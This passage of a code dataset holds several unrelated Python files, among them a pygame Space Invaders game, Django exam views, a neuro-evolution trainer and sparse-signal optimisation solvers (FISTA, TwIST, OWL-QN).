-f\")\n print(\"service stopped\")\n\n else:\n\n a = os.kill(pid, signal.SIGKILL)\n print(\"service stopped\")\n\n matlab = Dispatch('Matlab.application')\n try:\n\n matlab.execute(\"quit\")\n\n finally:\n pass\n \n\n except OSError:\n\n print(OSError)\n print('service is not running')\n\n\n # restart the service\n def restart(self):\n self.stop_server()\n self.start_server()\n\n\n # parse the data\n def get_data(self,result):\n\n data = {}\n result = result.split(\"&\")\n\n for i in result:\n result1 = i.split(\"=\")\n data[result1[0]] = result1[1]\n\n return data\n\n","sub_path":"app/python/matlabserver.py","file_name":"matlabserver.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"53375728","text":"################################################\r\n#\r\n# Program created by Peter Nguyen and Alexis Torres\r\n# Date: 11/30/19\r\n# Description: This program simulates the space invaders\r\n# game using pygame functions and modules from other files.\r\n# Modules used: Sound.py, Mob.py\r\n#\r\n################################################\r\n\r\n# libraries imported\r\nimport pygame\r\nimport random # random chance\r\nimport math # for calculating distance\r\nfrom pygame import mixer # for music functions\r\n#from Mob import player, obj\r\nimport Mob\r\nimport Sound\r\n\r\n################################################\r\n# initialize the pygame\r\n\r\npygame.init()\r\n################################################\r\n# width and length of game screen\r\nwidth = 800\r\nlength = 600\r\n\r\n################################################\r\n# create the screen\r\nscreen = pygame.display.set_mode((width,length))\r\n\r\n################################################\r\n# Sets fps\r\nclock = pygame.time.Clock()\r\n\r\n\r\n################################################\r\n#Title and Icon\r\npygame.display.set_caption(\"Space Invaders\")\r\nicon = pygame.image.load(\"icon.png\")\r\npygame.display.set_icon(icon)\r\n\r\n\r\n\r\n################################################\r\n# background\r\nbackground = Mob.obj('background.png',0,0)\r\nSound.background_music()\r\n\r\n################################################\r\n# Score\r\nfont = pygame.font.Font('freesansbold.ttf',32)\r\ndef show_score(score_value,x,y):\r\n score = font.render(\"Score :\"+ str(score_value), True, (255,255,255))\r\n screen.blit(score, (x,y))\r\n\r\n###############################################\r\n# Gameover text\r\nover_font = pygame.font.Font('freesansbold.ttf',64)\r\n\r\ndef game_over_text():\r\n over_text = over_font.render((\"GAME OVER!!\"), True, (255,255,255))\r\n screen.blit(over_text, (200,250))\r\n \r\n################################################\r\n# player\r\nship = Mob.player('player.png',400,500,0,0)\r\n\r\n################################################\r\n# Enemy\r\nnum_of_enem = 15\r\nenemy = []\r\nfor i in range(num_of_enem):\r\n enemy.append(Mob.enemy('enemy.png',random.randint(0,735),random.randint(50,150),4,40))\r\n\r\n################################################\r\n# bullet\r\nprojectile = Mob.bullet('bullet.png',0,500,0,20)\r\n\r\n################################################\r\n# GAME LOOP\r\ndef main():\r\n score_value = 0\r\n textX = 10\r\n textY = 10\r\n running = True\r\n while running:\r\n #clock.tick(240) # Time frames per second\r\n ########################################\r\n # RGB - red green blue\r\n screen.fill((255,255,255))\r\n # background image\r\n screen.blit(background.image,(0,0))\r\n\r\n 
########################################\r\n # check for end of game\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n\r\n ########################################\r\n # If keystroke is pressed\r\n if event.type == pygame.KEYDOWN:\r\n # left direction\r\n if event.key == pygame.K_LEFT:\r\n ship.X_change = -5\r\n \r\n # right direction\r\n if event.key == pygame.K_RIGHT:\r\n ship.X_change = 5\r\n\r\n # firing bullet\r\n if event.key == pygame.K_SPACE:\r\n # so that bullet finishes its path\r\n if projectile.state is 'ready':\r\n Sound.laser_sound()\r\n projectile.X_coord = ship.X_coord\r\n projectile.fire(screen)\r\n\r\n # releasing key \r\n if event.type == pygame.KEYUP:\r\n # for the ship to stop moving\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n ship.X_change = 0\r\n\r\n # movement of ship\r\n ship.X_coord += ship.X_change\r\n\r\n #########################################\r\n # GAME OVER \r\n for i in range(num_of_enem):\r\n if enemy[i].Y_coord > 440:\r\n for j in range(num_of_enem):\r\n enemy[j].Y_coord = 2000\r\n game_over_text()\r\n \r\n if projectile.isCollision(enemy[i]):\r\n enemy[i].hit()\r\n projectile.hit()\r\n Sound.collision_sound()\r\n score_value+=1\r\n \r\n enemy[i].movement(screen)\r\n enemy[i].X_coord += enemy[i].X_change\r\n \r\n # Checks if ship is within the screen boundaries\r\n ship.boundary()\r\n # Updates ship position\r\n ship.update_obj(screen)\r\n # Updates projectile position\r\n projectile.movement(screen)\r\n # Shows score\r\n show_score(score_value,textX, textY)\r\n # Updates whole screen\r\n pygame.display.update()\r\n\r\n\r\n################################################\r\n# Main Function Call\r\nmain()\r\n\r\n \r\n \r\n\r\n","sub_path":"Space_invaders.py","file_name":"Space_invaders.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"525368286","text":"#from django.shortcuts import render\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\n\nfrom .models import Exam, Question, Choice, Tag\n\ndef index(request):\n exam_list = Exam.objects.order_by('-pub_date')\n for exam in exam_list:\n print(exam.exam_name)\n context = {\n 'exam_list':exam_list\n }\n\n return render(request, 'exams/index.html', context)\n\ndef detail(request, exam_id):\n exam = get_object_or_404(Exam, pk=exam_id)\n return render(request, 'exams/detail.html', {'exam':exam})\n\ndef create(request):\n tags = Tag.objects.all()\n sorted(tags, key=lambda tag: tag.tag_text)\n questions = Question.objects.all()\n return render(request, 'exams/create.html', {'tags':tags, 'questions':questions})\n\ndef evaluate(request, exam_id):\n exam = get_object_or_404(Exam, pk=exam_id)\n selected_choices = {}\n\n response = \"Selected choices: \"\n for question in exam.question_set.all():\n try:\n selected_choice = question.choice_set.get(pk=request.POST['question' + str(question.id)])\n except (KeyError, Choice.DoesNotExist):\n choice_id = -1\n else:\n choice_id = selected_choice.id\n\n response += str(choice_id) + \" \"\n selected_choices[question.id] = choice_id\n #reversestr = reverse('exams:results', args=(exam_id,))\n #print(\"reverse \" + reversestr)\n #return render(reversestr)\n\n return results(request, exam_id, selected_choices)\n\ndef results(request, exam_id, selected_choices):\n exam = get_object_or_404(Exam, pk=exam_id)\n 
correct_count = 0\n total_count = len(exam.question_set.all())\n for question in exam.question_set.all():\n choice_id = selected_choices[question.id]\n if choice_id is not -1 and Choice.objects.get(pk=choice_id).is_correct():\n correct_count += 1\n\n percentage = correct_count / total_count * 100\n return render(request, 'exams/results.html', {'percentage': percentage})\n","sub_path":"src/exams/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"60290792","text":"import math\nimport numpy as np\nfrom copy import deepcopy\nimport re\n\nPOPULATION = 50\nSIZE = [3,9,1]\n\ndef sigmoid(z):\n\tf = lambda x: 0. if x < -500 else 1.0 if x >500 else 1.0/(1.0 + math.exp(-x))\n\tif isinstance(z,(float,int)):\n\t\treturn f(z)\n\telse:\n\t\treturn np.array(list(map(f,z)))\n\nclass NeuroNetwork():\n\tdef __init__(self,size = SIZE):\n\t\tself.num_layers = len(size)\n\t\tself.size = size\n\t\t# without input layer\n\t\t#self.biases = [np.random.randn(y) for y in size[1:]]\n\t\tself.weights = [np.random.randn(y,x)\n\t\t\t\t\t\tfor x,y in zip(size[:-1],size[1:])]\n\n\tdef feedforward(self, a):\n\t\t''' a is the input, could be the position of pipes'''\n\t\ta = a.copy()\n\t\tfor w in self.weights:\n\t\t\ta = sigmoid(np.dot(w,a))\n\t\treturn a\n\nclass individual():\n\t''' an individual is a neruo network'''\n\tdef __init__(self,score,netweights):\n\t\tself.score = score\n\t\tself.netweights = netweights\n\nclass Generation():\n\tdef __init__(self):\n\t\tself.individuals = []\n\t\tself.mutation_rate = 0.1\n\t\tself.elitism = 0.2\n\t\tself.population = POPULATION\n\t\tself.random_behavior = 0.1\n\n\tdef add(self,new):\n\t\t'''new is a individual, add it into list with order'''\n\t\tindex = 0\n\t\tfor i,nn in enumerate(self.individuals):\n\t\t\t# sort from high to low\n\t\t\tif new.score > nn.score:\n\t\t\t\tindex = i\n\t\t\t\tbreak\n\t\tself.individuals.insert(index,new)\n\n\tdef breed(self,ind1,ind2):\n\t\tchildweights = deepcopy(ind1.netweights)\n\t\tweight_n = [] # e.g [6,6] for a [2,3,2] network\n\t\tfor w in ind2.netweights:\n\t\t\tweight_n.append(w.size)\n\t\tfor i,n in zip(range(len(ind2.netweights)),weight_n):\n\t\t\tfor j in range(n):\n\t\t\t\tif np.random.random()<0.5:\n\t\t\t\t\tchildweights[i].flat[j] = ind2.netweights[i].flat[j]\n\t\t\t\t# mutation\n\t\t\t\tif np.random.random() len(self.individuals):\n\t\t\t\tmax_n = 0\n\n\tdef output(self,path='gene.txt'):\n\t\twith open(path,'a') as f:\n\t\t\tfor x in self.individuals:\n\t\t\t\tf.write(str(x.score)+',')\n\nclass Generations():\n\tdef __init__(self):\n\t\tself.generations = []\n\n\t@staticmethod\n\tdef readlog(path):\n\t\tdata = []\n\t\ttry:\n\t\t\twith open(path,'r') as f:\n\t\t\t\tw = f.read()\n\t\t\tp1 = r'\\[array\\(\\[([^\\)]*)\\]\\)'\n\t\t\ta = re.findall(p1,w)\n\t\t\tp2 = r', array\\(\\[([^\\)]*)\\]\\)'\n\t\t\tb = re.findall(p2,w)\n\t\t\tp3 = r'\\[([^\\]]*)\\]'\n\t\t\ttofloat = lambda x: list(map(float,x.split(',')))\n\t\t\tpipeline = lambda x: list(map(tofloat,re.findall(p3,x)))\n\t\t\ta = list(map(pipeline,a))\n\t\t\tb = list(map(pipeline,b))\n\t\t\tfor i,j in zip(a,b):\n\t\t\t\tdata.append([np.array(i),np.array(j)])\n\t\t\treturn data\n\t\texcept IOError:\n\t\t\treturn data\n\n\tdef first_generation(self):\n\t\toutweight = Generations.readlog('lastgeneration.txt')\n\t\tout = []\n\t\tfor w in outweight[:POPULATION]:\n\t\t\tnn = NeuroNetwork()\n\t\t\tnn.weights = w\n\t\t\tout.append(nn)\n\t\twhile len(out) < 
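Generation.breed above performs uniform crossover (each weight is taken from either parent with probability 0.5) followed by per-weight mutation; the mutation branch is truncated in the record, so the sketch below is a plausible reconstruction using the class's mutation_rate default, not the original code:

import numpy as np

def breed(w1, w2, mutation_rate=0.1, mutation_range=0.5):
    child = w1.copy()
    for j in range(child.size):
        if np.random.random() < 0.5:
            child.flat[j] = w2.flat[j]     # inherit this weight from parent 2
        if np.random.random() < mutation_rate:
            # nudge the weight by a small random amount (range is assumed)
            child.flat[j] += (np.random.random() * 2 - 1) * mutation_range
    return child

child = breed(np.zeros((2, 2)), np.ones((2, 2)))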
POPULATION:\n\t\t\tnn = NeuroNetwork()\n\t\t\tout.append(nn)\n\t\t\toutweight.append(nn.weights)\n\t\tself.generations.append(Generation())\n\t\treturn out,outweight\n\n\tdef next_generation(self):\n\t\tif len(self.generations) == 0:\n\t\t\treturn False\n\t\tgen = self.generations[-1].generate_next()\n\t\tself.generations.append(Generation())\n\t\treturn gen\n\n\tdef add_indi(self,indi):\n\t\tif len(self.generations) == 0:\n\t\t\treturn False\n\t\treturn self.generations[-1].add(indi)\n\n\tdef output(self):\n\t\t'''wirte the last generation into file'''\n\t\tself.generations[-1].output()\n\n\n\n\nclass NeuroEvolution():\n\tdef __init__(self):\n\t\tself.gene = Generations()\n\n\tdef restart(self):\n\t\tself.gene = Generations()\n\n\tdef next_generation(self):\n\t\tnetworks = []\n\t\tif len(self.gene.generations) == 0:\n\t\t\tnn,networks = self.gene.first_generation()\n\t\telse:\n\t\t\tnetworks = self.gene.next_generation()\n\t\t\tnn = []\n\t\t\tfor item in networks:\n\t\t\t\tn = NeuroNetwork()\n\t\t\t\tn.weights = item\n\t\t\t\tnn.append(n)\n\t\thistoric = 1 # number of generations keeps in gene\n\t\tif historic != 0:\n\t\t\tL = len(self.gene.generations)\n\t\t\tif L > historic:\n\t\t\t\tself.gene.generations = self.gene.generations[-historic:]\n\t\treturn nn\n\n\tdef network_score(self,score,nn):\n\t\tself.gene.add_indi(individual(score,nn.weights))\n\n\tdef output(self):\n\t\tself.gene.output()\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"neuro_evolution.py","file_name":"neuro_evolution.py","file_ext":"py","file_size_in_byte":4965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"607547261","text":"#!/usr/bin/env python3\nimport argparse\nfrom misc.region_reader import Region_Reader\nfrom typing import List, Tuple\n\n\ndef main():\n '''\n Main method to read in arguments from stdin and perform lookup with\n Region_Reader\n '''\n args = parse_args()\n args, reader = validate_args(args)\n with reader:\n locations = decode_regions(args['regions'],\n reader, args['list_sort'])\n write_regions(reader, locations)\n\n\ndef parse_args(args: List[str] = None) -> argparse.Namespace:\n '''\n Read in input arguments or the supplied list of strings\n Returns a dictionary of options\n '''\n parser = argparse.ArgumentParser(\n description='retrieve regions from indexed file.')\n\n parser.add_argument('regions',\n nargs='+',\n help='one or more region ids to retrieve')\n parser.add_argument('--filename',\n required=True,\n help='fa.gz file to look for regions')\n parser.add_argument('--list_sort',\n action='store_true',\n help='sort regions by the input order. Defualt sort by'\n ' disk location')\n parser.add_argument('--suppress_header',\n action='store_true',\n help='suppress printing of header line in stdout')\n\n return vars(parser.parse_args(args))\n\n\ndef validate_args(args: argparse.Namespace) -> Tuple[argparse.Namespace,\n Region_Reader]:\n '''\n Performs checks and conversions of input, raises ValueErrors if invalid\n '''\n reader = Region_Reader(args['filename'],\n as_fa=False,\n suppress_header=args['suppress_header'],\n num_lines=15)\n\n args['regions'] = [reader.convert_region(r) for r in args['regions']]\n\n return args, reader\n\n\ndef decode_regions(regions: List[int],\n reader: Region_Reader,\n retain_sort: bool) -> List[int]:\n '''\n Converts list of regions to file locations based on index dictionary\n Retain_sort controls if the output list order is determined by the\n region order or the disk location (i.e. 
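parse_args in extract_region.py takes an optional argv list, so the CLI can be exercised without touching sys.argv; a usage sketch assuming the module's parse_args is importable (the region ids and filename are made up):

args = parse_args(['r1', 'r2', '--filename', 'regions.fa.gz', '--list_sort'])
assert args['filename'] == 'regions.fa.gz'
assert args['regions'] == ['r1', 'r2'] and args['list_sort']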
values of index dict)\n '''\n\n result = [reader.decode_region(r) for r in regions]\n\n if retain_sort:\n return result\n else:\n return sorted(result)\n\n\ndef write_regions(reader: Region_Reader, locations: List[int]) -> None:\n '''\n Writes the regions specified by index to stdout\n If print_header is false, ignore first line after location\n '''\n for location in locations:\n reader.read_location(location)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"code/analyze/extract_region.py","file_name":"extract_region.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"47663944","text":"from sys import argv\nfrom os import getcwd\nfrom random import randint\nfrom datetime import datetime\n\n\nclass Utils:\n\n @staticmethod\n def obter_inteiro_aleatorio(inicio, fim):\n return randint(inicio, fim)\n\n @staticmethod\n def obter_data_e_hora_atual():\n return datetime.now().strftime('%d/%m/%Y %H:%M')\n\n @staticmethod\n def obter_caminho_atual():\n caminho = getcwd()\n\n caminho_de_execucao = Utils.obter_caminho_de_execucao()\n if caminho_de_execucao != '':\n caminho = f'{caminho}/{caminho_de_execucao}'\n\n return caminho\n\n @staticmethod\n def obter_caminho(caminho_do_arquivo):\n caminho = Utils.obter_caminho_atual()\n\n if Utils.verificar_modo_producao():\n caminho = f'{caminho}/lib'\n\n caminho = f'{caminho}/{caminho_do_arquivo}'\n\n return caminho\n\n @staticmethod\n def obter_parametros():\n return argv\n\n @staticmethod\n def obter_caminho_de_execucao():\n return '/'.join(argv[0].split('/')[:-1])\n\n @staticmethod\n def verificar_modo_dev():\n if '--dev' in argv:\n return True\n return False\n\n @staticmethod\n def verificar_modo_teste():\n if '--test' in argv:\n return True\n return False\n\n @staticmethod\n def verificar_modo_producao():\n if not Utils.verificar_modo_dev() and not Utils.verificar_modo_teste():\n return True\n return False\n","sub_path":"src/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"182395647","text":"import numpy as np\n\nheader = \"%+6s\\t%+8s\\t%+8s\\t%+8s\\t%+8s\\t%+8s\" % (\"#\", \"f(x)\", \"g(x)\", \"F(x)\", \"gradf(x)\", \"nonzeros\")\ncontentFormat = \"%6d\\t%4e\\t%4e\\t%4e\\t%4e\\t%6d\"\nprintHeader = lambda n_iter: (n_iter == 1)\nprintContent = lambda n_iter: (n_iter < 5) or ((n_iter > 3) and (n_iter % 10 == 0))\n\ndef fista(input_size, eval_fun, regulariser,\n regulariser_function=None, thresholding_function=None, initial_x=0,\n L0=1., eta=2., update_L=True,\n verbose=1, verbose_output=0):\n \"\"\"\n FISTA (Fast Iterative Shrinkage Thresholding Algorithm) is an algorithm to solve the convex minimization of\n y = f(x) + regulariser * g(x) with g(x) can be a continuous and non-differentiable function, such as L1 norm or total variation in compressed sensing.\n If f(x) = || Ax - b ||^2, then the gradient is Df(x) = 2 * A.T * (Ax - b).\n This is from A. Beck and M. 
Teboulle's paper in 2009: A Fast Iterative Shrinkage-Thresholding Algorithm for Linear Inverse Problems.\n \n Arguments\n ---------\n input_size: (int or tuple of ints) shape of the signal\n eval_fun: (function with two outputs) evaluation function to calculate f(x) and its gradient, Df(x)\n regulariser: (float) regulariser weights to be multiplied with the regulariser function, g(x)\n regulariser_function: (function or string) the regulariser function, g(x), or string to specify the regulariser, such as \"l1\" or \"tv\" (default: reg_l1)\n thresholding_function: (function) function to apply thresholding (or denoising) to the signal in the gradient descent.\n This is ignored if regulariser function is a string (default: soft_threshold_l1)\n initial_x: (int or array) 0 for zeros, 1 for random, or array with shape = input_size to specify the initial guess of the signal (default: 0)\n L0: (float) initial guess of the inverse of step size (default: 1)\n eta: (float) the increment of L0 if the step size is too large (default: 2)\n update_L: (bool or int) flag whether to update L or keep it fix (default: True)\n verbose: (bool or int) flag to show the iteration update (default: True)\n verbose_output: (bool or int) indicate whether the function should return the full information or just the signal (default: False)\n \n Returns\n -------\n The signal if (verbose_output == False) or a dictionary with the output signal (x), number of iterations (n_iter), \n evaluation function (fx), gradient (gradx), and regulariser function (gx) values\n \"\"\"\n ############################### argument check ###############################\n eta = float(eta)\n initial_x = _get_initial_x(initial_x, input_size)\n regulariser_fun, thresholding_fun = _get_regulariser(regulariser, regulariser_function, thresholding_function)\n \n ############################### initialisation ###############################\n L = float(L0)\n x = initial_x\n y_next = x\n t_next = 1.\n F_prev = None\n \n ############################### main iteration ###############################\n n_iter = 1\n while True:\n # obtain the parameters from the previous iteration\n L_prev = L\n x_prev = x\n y = y_next\n t = t_next\n \n # calculate the function and the gradient of the evaluation function\n f_y, grad_y = eval_fun(y)\n g_y = regulariser_fun(y)\n F = f_y + g_y\n \n # print the message\n if verbose == 1:\n if printHeader(n_iter): print(header)\n if printContent(n_iter): print(contentFormat % (n_iter, f_y, g_y, F, np.sum(np.abs(grad_y)), np.sum(y > 0)))\n \n # check convergence and update F_prev\n if F_prev != None and np.abs(F - F_prev) / (1e-10+np.abs(F_prev)) < 1e-6: break\n F_prev = F\n \n # find i_k for L=eta**i_k*L such that F(pL(yk)) <= QL(pL(yk), yk)\n L_test = L_prev\n while True:\n pLy = thresholding_fun(y - 1./L_test * grad_y, float(regulariser)/L_test) # gradient descent with thresholding afterwards\n if not update_L: break\n \n pLy_min_y = pLy - y\n reg_pLy = regulariser_fun(pLy)\n \n f_pLy, grad_pLy = eval_fun(pLy)\n F_pLy = f_pLy + reg_pLy\n Q_pLy = f_y + np.sum(pLy_min_y * grad_y) + L_test/2. * np.sum(pLy_min_y * pLy_min_y) + reg_pLy\n \n if (F_pLy <= Q_pLy): break\n L_test *= eta\n \n # calculate the next parameters\n L = L_test\n x = pLy\n t_next = (1. + np.sqrt(1 + 4.*t**2))/2.\n y_next = x + ((t - 1.) 
/ t_next) * (x - x_prev)\n n_iter += 1\n \n ############################### output ###############################\n if verbose_output:\n return {\"x\": y, \"n_iter\": n_iter, \"fx\": f_y, \"gradx\": grad_y, \"gx\": g_y}\n else:\n return y\n\ndef twist(input_size, eval_fun, regulariser,\n regulariser_function=None, thresholding_function=None, initial_x=0,\n alpha=0, beta=0, lmbda1=1e-4, max_eigval=2., monotone=True,\n verbose=1, verbose_output=0):\n \"\"\"\n TwIST (Two Steps Iterative Shrinkage Thresholding) is an algorithm to solve the convex minimization of\n y = f(x) + regulariser * g(x) with g(x) can be a continuous and non-differentiable function, such as L1 norm or total variation in compressed sensing.\n If f(x) = || Ax - b ||^2, then the gradient is Df(x) = 2 * A.T * (Ax - b).\n This is from J. M. Bioucas-Dias and M. A. T. Figueiredo's paper in 2007: A New TwIST: Two-Step Iterative Shrinkage/Thresholding Algorithms for Image Restoration.\n \n Arguments\n ---------\n input_size: (int or tuple of ints) shape of the signal\n eval_fun: (function with two outputs) evaluation function to calculate f(x) and its gradient, Df(x)\n regulariser: (float) regulariser weights to be multiplied with the regulariser function, g(x)\n regulariser_function: (function or string) the regulariser function, g(x), or string to specify the regulariser, such as \"l1\" or \"tv\" (default: reg_l1)\n thresholding_function: (function) function to apply thresholding (or denoising) to the signal in the gradient descent.\n This is ignored if regulariser function is a string (default: soft_threshold_l1)\n initial_x: (int or array) 0 for zeros, 1 for random, or array with shape = input_size to specify the initial guess of the signal (default: 0)\n alpha: (float between 0 and 1) a step size in the algorithm (see eq. 16) (default: 2. / (1. + np.sqrt(1. - rho0^2)))\n beta: (float between 0 and 1) a step size in the algorithm (see eq. 16) (default: alpha * 2. / (lmbda1 + 1))\n lmbda1: (float) chi parameter in the algorithm (see eq. 20).\n Set lmbda1 = 1e-4 for severely ill conditioned problem, 1e-2 for mildly ill, and 1 for unitary operator (default: 1e-4)\n max_eigval: (float) the guessed largest eigenvalue of A.T*T which equals to the inverse of the step size (default: 2)\n monotone: (bool or int) indicate whether to enforce monotonic function's value decrease in every iteration (default: True)\n verbose: (bool or int) flag to show the iteration update (default: True)\n verbose_output: (bool or int) indicate whether the function should return the full information or just the signal (default: False)\n \n Returns\n -------\n The signal if (verbose_output == False) or a dictionary with the output signal (x), number of iterations (n_iter), \n evaluation function (fx), gradient (gradx), and regulariser function (gx) values\n \"\"\"\n \n ############################### argument check ###############################\n # twist parameters\n lmbdaN = 1.\n rho0 = (1. - lmbda1/lmbdaN) / (1. + lmbda1/lmbdaN)\n if alpha == 0:\n alpha = 2. / (1. + np.sqrt(1. - rho0*rho0))\n if beta == 0:\n beta = alpha * 2. 
/ (lmbda1 + lmbdaN)\n initial_x = _get_initial_x(initial_x, input_size)\n regulariser_fun, thresholding_fun = _get_regulariser(regulariser, regulariser_function, thresholding_function)\n \n ############################### initialisation ###############################\n regulariser = float(regulariser)\n x = initial_x\n x_mid = initial_x\n \n # calculate the initial objective function\n y, grad_y = eval_fun(x)\n F_prev = y + regulariser_fun(x)\n \n ############################### main iteration ###############################\n n_iter = 1\n twist_iter = 0\n while True:\n while True:\n y_mid, grad_y_mid = eval_fun(x_mid)\n thresholding_x_mid = thresholding_fun(x_mid - grad_y_mid/max_eigval, regulariser/max_eigval)\n \n if twist_iter == 0: # do an IST iteration\n y_next, grad_y_next = eval_fun(thresholding_x_mid)\n F = y_next + regulariser_fun(thresholding_x_mid)\n \n # if not decreasing, then double max_eigval\n if F > F_prev:\n max_eigval *= 2.\n if max_eigval > 1e10: break\n # print(max_eigval)\n else:\n twist_iter = 1\n x = x_mid\n x_mid = thresholding_x_mid\n break\n else:\n # perform TwIST\n z = (1 - alpha) * x + (alpha - beta) * x_mid + beta * thresholding_x_mid\n y_next, grad_y_next = eval_fun(z)\n F = y_next + regulariser_fun(z)\n \n # if F > F_prev and enforcing monotone, do an IST iteration with double eigenvalue\n if (F > F_prev) and monotone:\n twist_iter = 0\n else:\n x = x_mid\n x_mid = z\n break\n \n if max_eigval > 1e10: break\n \n # print the message\n if verbose == 1:\n if printHeader(n_iter): print(header)\n if printContent(n_iter): print(contentFormat % (n_iter, y_next, F-y_next, F, np.sum(np.abs(grad_y_next)), np.sum(x_mid > 0)))\n \n # check convergence and update F_prev\n if F_prev != None and np.abs(F - F_prev) / (1e-10+np.abs(F_prev)) < 1e-6: break\n F_prev = F\n \n # prepare the variables for the next iteration\n n_iter += 1\n \n ############################### output ###############################\n if verbose_output:\n return {\"x\": x_mid, \"n_iter\": n_iter, \"fx\": y_next, \"gradx\": grad_y_next, \"gx\": F-y_next}\n else:\n return x_mid\n\ndef owlqn(input_size, eval_fun, regulariser,\n initial_x=0, m=10, beta=0.7, gamma=0.8,\n verbose=1, verbose_output=0):\n \"\"\"\n OWL-QN (Orthant Wise Limited-memory Quasi Newton) is an algorithm to solve the convex minimization of y = f(x) + regulariser * |x|_1.\n This algorithm is based on L-BFGS, which uses second-order information (an estimated inverse Hessian) during the search.\n If f(x) = || Ax - b ||^2, then the gradient is Df(x) = 2 * A.T * (Ax - b).\n This is from G. Andrew and J. Gao's paper in 2007: Scalable training of L1-regularized log-linear models.\n \n Arguments\n ---------\n input_size: (int or tuple of ints) shape of the signal\n eval_fun: (function with two outputs) evaluation function to calculate f(x) and its gradient, Df(x)\n regulariser: (float) regulariser weight to be multiplied with the L1 norm of the signal, |x|_1\n initial_x: (int or array) 0 for zeros, 1 for random, or array with shape = input_size to specify the initial guess of the signal (default: 0)\n m: (int) number of previous steps whose displacements and gradient differences are kept to estimate the inverse Hessian (default: 10)\n beta: (float between 0 and 1) backtracking factor used to shrink the step size during the line search (default: 0.7)\n gamma: (float between 0 and 1) sufficient-decrease constant in the line search acceptance test (default: 0.8)\n verbose: (bool or int) flag to show the iteration update (default: True)\n verbose_output: (bool or int) indicate whether the function should return the full information or just the signal (default: False)\n \n Returns\n -------\n The signal if (verbose_output == False) or a dictionary with the output signal (x), number of iterations (n_iter), \n evaluation function (fx), gradient (gradx), and regulariser function (gx) values\n \"\"\"\n ############################### argument check ###############################\n initial_x = _get_initial_x(initial_x, input_size)\n \n _regulariser_fun = lambda x: regulariser * np.sum(np.abs(x))\n _constraint_orthant = lambda var, orthant: var * (np.sign(var) == orthant)\n \n ############################### initialisation ###############################\n S = [] # list to store the displacements\n Y = [] # list to store the differences in gradient\n x_next = initial_x\n f_x_next, grad_x_next = eval_fun(x_next)\n g_x_next = _regulariser_fun(x_next)\n alpha = 1.\n \n def _compute_direction_lbfgs(S, Y, grad):\n # S: displacement history\n # Y: difference in gradient history\n # grad: first order gradient direction\n # compute the gradient for maximisation\n \n N = len(Y)\n if N == 0: return grad\n \n q = grad\n alphas = [None for i in range(len(Y))]\n rhos = [None for i in range(len(Y))]\n for i in range(len(Y)-1,-1,-1):\n # compute the rho, alpha (and save them), and update q\n rhos[i] = 1./np.sum(Y[i] * S[i])\n alphas[i] = rhos[i] * np.sum(S[i] * q)\n q = q - alphas[i] * Y[i]\n \n H_0 = 1. 
* np.sum(S[-1] * Y[-1]) / np.sum(Y[-1] * Y[-1])\n z = H_0 * q\n \n for i in range(len(Y)):\n beta = rhos[i] * np.sum(Y[i] * z)\n z = z + S[i] * (alphas[i] - beta)\n \n return z\n \n ############################### main iteration ###############################\n n_iter = 1\n while True:\n f_x = f_x_next\n grad_x = grad_x_next\n g_x = g_x_next\n F_x = f_x + g_x\n x = x_next\n \n # print the message\n if verbose == 1:\n if printHeader(n_iter): print(header)\n if printContent(n_iter): print(contentFormat % (n_iter, f_x, g_x, F_x, np.sum(np.abs(grad_x)), np.sum(x > 0)))\n \n # compute the pseudo-gradient of f by computing the directional gradient of f first\n sgnx = np.sign(x)\n sgnx_0 = (sgnx == 0)\n grad_pos_x = grad_x + regulariser * (sgnx + sgnx_0)\n grad_neg_x = grad_x + regulariser * (sgnx - sgnx_0)\n pgrad_x = grad_pos_x * (grad_pos_x < 0) + grad_neg_x * (grad_neg_x > 0)\n \n # choose the orthant\n orthant = np.sign(x) * (x != 0) - np.sign(pgrad_x) * (x == 0)\n \n # compute the inverse hessian multiplied by the pseudo gradient from the S & Y history\n grad_2nd = _compute_direction_lbfgs(S, Y, pgrad_x)\n \n # constrain the gradient direction\n grad_2nd_orthant = _constraint_orthant(grad_2nd, np.sign(pgrad_x))\n \n # do line search\n alpha = 1.\n while True:\n x_next = _constraint_orthant(x - grad_2nd_orthant * alpha, orthant)\n f_x_next, grad_x_next = eval_fun(x_next)\n g_x_next = _regulariser_fun(x_next)\n if f_x_next + g_x_next <= F_x + gamma * np.sum(pgrad_x * (x_next - x)): break\n alpha *= beta\n # n += 1\n # print(n)\n \n # check convergence\n if np.abs(f_x_next - f_x) / (1e-10 + np.abs(f_x)) < 1e-6: break\n n_iter += 1\n \n # update the histories\n S.append(x_next - x)\n Y.append(grad_x_next - grad_x)\n if len(S) > m: S.pop(0)\n if len(Y) > m: Y.pop(0)\n \n ############################### output ###############################\n if verbose_output:\n return {\"x\": x_next, \"n_iter\": n_iter, \"fx\": f_x_next, \"gradx\": grad_x_next, \"gx\": g_x_next}\n else:\n return x_next\n\ndef _get_initial_x(initial_x, input_size):\n if not hasattr(initial_x, \"__iter__\"):\n if initial_x == 0: # zeros initialisation\n initial_x = np.zeros(input_size)\n elif initial_x == 1: # random initialisation\n initial_x = np.random.random(input_size)\n return initial_x\n\ndef _get_regulariser(regulariser, regulariser_function, thresholding_function):\n if regulariser_function is None: # fall back to the documented default regulariser, the L1 norm\n regulariser_function = \"l1\"\n if hasattr(regulariser_function, '__call__'): # if the regulariser fun is callable, then set the regulariser function as regulariser * regulariser_fun\n regulariser_fun = lambda x: regulariser * regulariser_function(x)\n if not hasattr(thresholding_function, '__call__'): raise 